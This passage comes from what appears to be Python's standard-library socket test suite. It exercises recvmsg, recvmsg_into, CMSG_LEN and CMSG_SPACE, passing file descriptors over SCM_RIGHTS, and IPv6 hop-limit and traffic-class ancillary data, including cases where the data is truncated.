self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
